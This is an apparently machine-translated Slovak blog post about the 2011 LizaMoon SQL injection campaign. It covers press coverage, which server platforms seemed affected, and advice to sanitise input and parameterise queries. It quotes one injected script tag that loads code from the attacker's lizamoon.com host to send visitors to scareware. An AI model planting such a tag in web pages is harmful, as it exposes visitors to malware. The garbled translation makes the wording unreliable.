Veľká Lizamoon SQL Injection útok – Marec-apríl 2011



Dobre – Piatok veci začali začína byť zaujímavé na tech spravodajské weby. Väčšina stránok bola spustená falošné apríl oklame príbehy a niekoľko vrátane Websense bola bežiaci s veľkým útokom deje pred mnohými SQL založené na webových stránkach. Údaje boli povrchné – ľudí bolo povedané, hľadať ur.php súborov v adresári svojich webových (, Ktorá nie je práve dobrý test, či vaše stránky boli infikované týmto SQL injection…) “<script src = http://lizamoon.com / ur.php”> je príklad kódu, ktorý sa vkladá do databáz SQL a čo robí, je to v podstate núti návštevníkov k návšteve scareware miesto, kde malware môže byť nainštalovaný na svojom počítači, ktorý tvrdí, že majú vírus…. (koľko z tých, ktoré sme videli v poslednej 5-10 rokov?)

Jeden z mojich nepríjemností s tech novinky (a najmä vírus novinky) Pokrytie je, že keď príbeh dostane dostatočne veľká, aby boli pokryté veľkými médiami, nikdy to robiť spravodlivo. Chcem informácie o. Čo je to útok? Aké programy sú ohrozené, je tam vzor?


To je jedna z vecí, ktoré obťažoval ma o pokrytie tejto konkrétnej Beastie…. jo dobre, že je to SQL injection – je to mysql? MS-SQL? niektoré ďalšie zmes? Je to útok wordpress alebo Drupal alebo pohyblivý typ, alebo čo? Nie je veľa detailov sa nachádzalo. Tam bolo odporné nároky 4 miliónov infikovaných stránok (, Ktorý je silne prehnané.) Najlepší odhad videl som ich v 200,000+ rozsah. Vyhľadávanie Google ukázal, milióny stránok s podozrivým textu i keď to zahŕňalo viac stránok na webe a mnoho lokalít, ktoré boli jednoducho reportovať na exploitu.

So…. Sobotu som bol požiadaný o tom a ja som nebol schopný urobiť veľa výskumu. Tako, Som trochu výskum a zistil, že to vyzerá najviac postihnuté všetky stránky, ktoré boli identifikované Websense bol Microsoft SQL backend. V tú chvíľu som dych trochu jednoduchšie v tom, že nebudem naliehavo upgrade 50 alebo tak MySQL založil blog motory… V skutočnosti po prečítaní trochu ďalej som v podstate podal ho na víkend, keď som nič nasadenie, ktorá je závislá na MS-SQL.

Tak, dnes som si myslel, že tam musí byť nejaký vzor, ​​čo je zraniteľné…. Pri pohľade na google vyhľadávať , Ktorý ukazuje infikovaný reklama kódu….

Vidím. CFM na stranách, .asp, .aspx stránky, Našiel som stránku s tým poháňaných:

“Mango Blog – Blog ColdFusion motor”

Vidím niekoľko ďalších lokalít, ktoré sa zdajú byť poháňaný databázy, ale nie je jasné, aké stránky designu motora som sa lookiing. Naozaj spoločným menovateľom je asp / studená fúzie a microsofts rámca pre webové aplikácie.

Najlepšia rada, ktorá je vzhľadom k tomu, že by ste mali vždy filtrovať / dezinfikuje vstup do databáz. Inými slovami, neverím svojim návštevníkom dať do dobrých vecí vo formulároch. Verte im, aby sa pokúsila preniknúť do databázy pod pomocou znakov, ktoré sa chystáte dať nápovedu k databáze, že je čas, aby sme sa namiesto príkazu ošetrovanie vstup ako text.

Tam je dobrý článok o asp.net Prevencia SQL injection.

Je to naozaj pripomína tohto veľkého komiksu…. o malé Bobby tabuľky….

Toľko hovorí…. Zdá sa, že lepšie je poradiť paramaterize vaše SQL volania….

Dobrý tutoriál stránky o zabránení SQL injection problémy…

Mám podozrenie, existuje mnoho set vlastníkmi webov, ktoré ešte nie sú vedomí toho, že boli ohrozené.

Tak tu je flamebait – sú zlé kódovanie SQL praktizuje spoločný rys v prostredí Microsoft toolkit?

Pochybujem, že je to len otázkou nástrojov MS – aj šírenie “ľahko vytvoriť svoj vlastný databázy riadený stránky” nástrojov Zdá sa, že podporí návrh nedbalý. (Áno – Viem, že… založené na open source blogu motory mali svoj podiel na vstrekovacích problémov sql príliš….)

Takže je jednoduché pre každého, kto aby databáza riadené webové stránky neznamená, že všetci budú dodržiavať odporúčané postupy pre overovanie vstupu. (V skutočnosti vo väčšine vecí, ktoré som kedy videl – uľahčením Zdá sa, že podporí povrchnosti…)

Súvisiace príspevky

Blog Traffic Exchange Súvisiace príspevky
  • Macromedia Flash Player chybu Závažná chyba zabezpečenia bola zistená vo verziách programu Flash Player pred 7.0.19.0 Mnoho stránok vyžaduje Flash Player, aby ste videli rôzne funkcie na webe (V závislosti na mieste tento siaha od reklamy k navigácii webu.) Špeciálne vytvorený súbor SWF na diaľkové ......
  • Zotob aktualizácia Pár neskorých popoludňajších zmenách v Handling denníku na incidents.org (inštitút, bez toho, aby). Pre začiatok, vyzerá to, že tam môže byť odchýlka Zotob, ktorá má hmotnosť Mailer súčasťou. Nechcel som konkrétne vidieť v writeups SARC zo zotob.a alebo zotob.b, tak, Zaujímalo by ma, či je to ......
  • Najväčší počítačovej zabezpečení stále Hovorím trochu o počítačových vírusoch a počítačovej bezpečnosti na tejto stránke. Je to pravdepodobne jeden z najväčších problémov, ktoré som sa popasovať s pre svojich zákazníkov. Dnes budem hovoriť o najväčší zraniteľnosti počítačovej bezpečnosti existuje. Vlastne, To je všeobecná chyba zabezpečenia. Je ......
Blog Traffic Exchange Súvisiace odkazy
  • Základné SEO Tipy Naisto, SEO sa určite stane veľmi dôležitou súčasťou online marketing. Teda z tohto dôvodu, by ste mali vybaviť sa s niektorými efektívne SEO tipy, takže si môžete naozaj riadiť prevádzku na vašich webových stránkach a tiež podporiť vaše podnikanie. Dobre, Tu je niekoľko základných tipov, ktoré vám ......
  • Zvýšenie Blog prevádzky stránok Priťahuje blogu prevádzku naozaj ťažký problémovú? Existujú nejaké naozaj, neuveriteľne jednoduché spôsoby, ako nová osoba blogov môže zvýšiť ich návštevnosť blogu? Tu sú niektoré zo spôsobov, ako môžete prilákať nových blogu návštevnosť vašich webových stránok bez ťažké, rovnako ako ......
  • Sociálna neistota (Redux) Písal som o vysokých Ceny Phantom človek môže stretnúť v dôsledku zdanenia sociálnej podpory, a ja som naďalej dostávať pozitívnu spätnú väzbu na tento článok. Dostal som dve otázky, ktoré som si myslel, vhodné riešenie tu. Je vek, po ktorom si môžete zarobiť toľko ......
www.pdf24.org    Pošli článok ako PDF   

Podobné príspevky


Pozrite sa, čo sa stalo tento deň v histórii buď z BBC Wikipedia
Hľadať:
Kľúčové slová:
Amazon Logo

Komentáre sú uzavreté.


Prepnúť na našich mobilných stránok